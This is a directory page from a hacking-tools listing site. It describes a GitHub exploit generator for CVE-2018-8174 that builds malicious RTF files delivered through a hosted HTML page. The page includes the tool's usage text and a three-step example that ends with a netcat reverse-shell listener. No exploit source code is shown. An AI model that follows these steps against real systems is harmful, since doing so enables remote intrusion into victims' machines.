Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2018-8174_EXP — Python-based exploit generator for CVE-2018-8174, producing malicious RTF files delivered via HTML pages with reverse shell callback capability. | Kitploit
Tools/GitHubGitHub/ericisnotrealname/cve-2018-8174_exp
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubericisnotrealname/cve-2018-8174_exp

CVE-2018-8174_EXP

Python-based exploit generator for CVE-2018-8174, producing malicious RTF files delivered via HTML pages with reverse shell callback capability.

View Repository

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
26 years agoNot yet reviewed
Share

CVE-2018-8174_EXP

usage: CVE-2018-8174.py [-h] -u URL -o OUTPUT [-i IP] [-p PORT]

Exploit for CVE-2018-8174

optional arguments: -h, --help show this help message and exit -u URL, --url URL exp url -o OUTPUT, --output OUTPUT Output exploit rtf -i IP, --ip IP ip for netcat -p PORT, --port PORT port for netcat

eg:

  1. python CVE-2018-8174.py -u http://1.1.1.1/exploit.html -o exp.rtf -i 2.2.2.2 -p 4444
  2. put exploit.html on your server (1.1.1.1)
  3. netcat listen on [any] 4444 (2.2.2.2)

enjoy it !

Download Tool